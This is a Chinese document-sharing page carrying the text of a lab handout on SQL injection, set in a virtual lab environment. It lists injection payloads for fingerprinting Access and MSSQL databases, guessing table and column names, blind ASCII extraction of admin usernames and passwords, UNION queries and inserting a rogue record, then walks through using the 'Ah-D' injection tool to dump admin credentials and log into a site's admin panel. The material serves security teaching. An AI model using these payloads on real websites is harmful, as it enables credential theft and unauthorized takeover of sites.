• / 17
  • 下载费用:10 金币  

l003001012-http攻击与防范-sql注入攻击-02啊d工具实例.docx

关 键 词:
l003001012 http 攻击 防范 sql 注入 02 工具 实例
资源描述:
课程编写类别内容实验课题名称HTTP攻击与防范SQL注入攻击02啊D工具实例实验目的与要求1、了解常用WEB脚本2、了解常用WEB脚本漏洞的利用点实验环境VPC1虚拟PC)操作系统类型WINDOWS;网络接口本地连接VPC1连接要求PC网络接口,本地连接与实验网络直连软件描述1、学生机要求安装JAVA环境2、VPC安装WINDOWS实验环境描述1、学生机与实验室网络直连2、VPC1与实验室网络直连3、学生机与VPC1物理链路连通;预备知识1、类型数字型AND11AND12判断是否存在注入字符型'AND'1''1'AND'1''2搜索型关键字'AND11AND'''关键字'AND12AND'''2、IIS报错情况下使用ANDUSER0(判断是ACCESS还是MSSQL)3、不报错则使用各自数据库特性来判断ANDSELECTCOUNTFROMMSYSOBJECTS0(返回权限不足ACCESS数据库)ANDSELECTCOUNTFROMSYSOBJECTS0(返回正常则为MSSQL数据库)ANDDB_NAME()0返回数据库名AND0SELECTVERSION判断版本信息ANDDB_NAME()0(返回数据库名)注意猜解之前先要找到后台地址,不然白忙了4、ACCESS注入(1)猜解表名(正常则存在ADMIN,不正常则不存在)ANDEXISTSSELECTFROMADMINANDSELECTCOUNTFROMADMIN0(2)猜解字段(字段USERNAME存在则正常,不正常则不存在)ANDSELECTUSERNAMEFROMADMIN0ANDEXISTSSELECTUSERNAMEFROMADMIN(3)猜解用户名和密码长度ANDSELECTTOP1LENUSERNAMEFROMADMIN0ANDSELECTTOP1LENPASSWORDFROMADMIN05、原理如果TOP1的USERNAME长度大于0,则条件成立;接着就是1、2、3这样测试下去,一直到条件不成立为止,比如4成立,5不成立,就是LENUSERNAME5,即用户名长度为5得到USERNAME的长度后,用MIDUSERNAME,N,1截取第N位字符,再ASCMIDUSERNAME,N,1得到ASCII码6、猜解用户ANDSELECTTOP1ASCMIDUSERNAME,1,1FROMADMIN0,1,2„,当输入到109时,显示错误,而108之前显示正确,说明第一个字符的ASCII码为109,得到第一个字符是M。同理ANDSELECTTOP1ASCMIDUSERNAME,2,1FROMADMIN0,1,2„到114的时候不成立,说明第二个字符的ASCII码值为114,字符为R。注意的是英文和数字的ASCII码在1128之间7、MSSQL注入HAVING11【爆出一个表名及字段,如列'USERSID'在选择列表中无效】GROUPBYUSERSIDHAVING11GROUPBYUSERSID,USERSUSERNAME,USERSPASSWORD,USERSPRIVSHAVING11INSERTINTOUSERSVALUES666,ATTACKER,FOOBAR,0XFFFF【插入新记录】8、猜解表名SQLSERVER的每一个数据库都会有用户表和系统表,在系统表SYSOBJECTS中,数据库内创建的每个对象(约束、默认值、日志、规则、存储过程等)在SYSOBJECTS表中占一行,那么也就是说当前数据库的表名都会在该表内有存在。我们常用到的参数有三个,NAME(数据表的名字),XTYPE(数据表的类型U为用户表),ID(数据表的对象标志)。ANDSELECTTOP1NAMEFROMSYSOBJECTSWHEREXTYPE'U'0得到第一个表名比如USERANDSELECTTOP1NAMEFROMSYSOBJECTSWHEREXTYPE'U'ANDNAMENOTIN'USER'0得到第二个表名,后面的以此类推。9、猜解列名用到系统自带的2个函数COL_NAME和OBJECT_ID,COL_NAME的格式是“COL_NAMETABLE_ID,COLUMN_ID参数TABLE_ID是表的标识号,COLUMN_ID是列的标识号,OBJECT_IDADMIN就是得到ADMIN在SYSOBJECTS中的标识号,COLUMN_ID1,2,3表明ADMIN的第1,2,3列。ANDSELECTTOP1COL_NAMEOBJECT_ID'ADMIN',1FROMSYSOBJECTS0【得到ADMIN字段的第一个列名“USERNAME”依次类推,得到“PASSWORD”“ID”等等】10、猜解字段内容ANDSELECTTOP1USERNAMEFROMADMIN0【直接得到用户名】ANDSELECTTOP1PASSWORDFROMADMIN0【直接得到密码】UNION联合查询SELECTNAME,PASSWORD,IDFROMUSERUNIONSELECTUSER,PWD,UIDFROM表名AND11UNIONSELECT1,2,3,4,5FROM表名数值从1开始慢慢加,如果加到5返回正常,那就存在5个字段11、ASCII逐字解码法(1)猜解列长度ANDSELECTTOP1LEN列名FROM表名N其中N是数字,变换这个N的值猜解列长度,当N为6正确,为7错误,则长度为7猜解第二条记录就该使用SELECTTOP1LEN列名FROM表名WHERE列名NOTINSELECTTOP1列名FROM表名(2)猜解用户和密码ASC函数和MID函数,ASCMID列名,N,1得到“列名”第N位字符ASCII码猜解语句为ANDSELECTTOP1ASCMID字段,1,1FROM数据库名ASCII码区间判断语句BETWEENAND中文处理法当ASCII转换后为“负数”使用ABS函数取绝对值。例ANDSELECTTOP1ABSASCMID字段,1,1FROM数据库名ASC码(3)ASCII逐字解码法的应用1、猜解表名ANDSELECTCOUNTFROMADMIN02、猜解列名ANDSELECTCOUNT列名FROM表名03、猜解用户个数ANDSELECTCOUNTFROM表名1,22正常,3错误,表中有3条记录。4、猜解用户名的长度ANDSELECTLEN列名FROM表名1、2、3、4。5、猜解用户名ANDSELECTCOUNTFROM表名WHEREASCMID列名,1,1BETWEEN30AND1300最后提交ANDSELECTASCMID列名,1,1FROM表名ASCII的值6、猜解管理员的密码按照上面的原理,把上面的语句中ASCMID列名,1,1的列名换成PASSWORD就能得到密码了。实验内容1、掌握WEB脚本利用2、掌握WEB漏洞利用点3、掌握SQL注入工具的使用实验步骤实验操作1、学生单击实验拓扑按钮,进入实验场景,(第一次启动目标主机,还需要安装JAVA控件)。,2、学生输入账号ADMINISTRATOR,密码123456,登录到实验场景中的目标主机。如图所示3、打开IE浏览器,登录WWWSQLCOM网站。如图所示4、打开D\TOOLS目录啊DRAR解压包,点击啊DQIQIEXE。如图所示5、打开QIQIEXE软件,点击登录进入。如图所示点击登陆6、在检测网址栏中输入HTTP//WWWSQLCOM,点击扫描注入点,并点击打开网页。如图所示注图中4就是检测出来可用注入的点。7、双击“可用注入点”中的红色网址。进入如图所示页面8、点击检测按钮,软件提示准备就绪,点击检测表段,即可对字段进行扫描。如图所示9、点击检测表段中的“ADMIN”,然后点击检测字段。即可看到如图所示字段10、勾选上USERNAME、PASSWORD、ID并点击检测内容,等待几分钟,在编号中会出现USERNAME、PASSWORD、ID的信息。如图所示11、点击“管理入口检测”选项,再点击“检测管理入口”按钮,出现如图所示页面12、右键点击HTTP//WWWSQLCOM/ADMINASP网址,点击“用IE打开连接”。如图所示13、输入获取的USERNAME和PASSWORD即可进入到HTTP//WWWSQLCOM的管理页面。如图所示14、使用ADMIN账户登陆以后我们具有了管理权限,可对该网站进行操作。如图所示15、实验结束,请关闭虚拟机。
展开阅读全文
  麦档网所有资源均是用户自行上传分享,仅供网友学习交流,未经上传用户书面授权,请勿作他用。
0条评论

还可以输入200字符

暂无评论,赶快抢占沙发吧。

关于本文
本文标题:l003001012-http攻击与防范-sql注入攻击-02啊d工具实例.docx
链接地址:https://www.maidoc.com/p-1557.html

当前资源信息

lo****j

编号: 20180301224545166524

类型: 共享资源

格式: DOCX

大小: 512.46KB

上传时间: 2018-03-01

关于我们 - 网站声明 - 网站地图 - 资源地图 - 友情链接 - 网站客服 - 联系我们

[email protected] 2018-2020 maidoc.com版权所有  文库上传用户QQ群:3303921 

麦档网为“文档C2C模式”,即用户上传的文档所得金币直接给(下载)用户,本站只是中间服务平台,本站所有文档下载所得的金币归上传人(含作者)所有。
备案号:蜀ICP备17040478号-3  
川公网安备:51019002001290号 

本站提供办公文档学习资料考试资料文档下载


收起
展开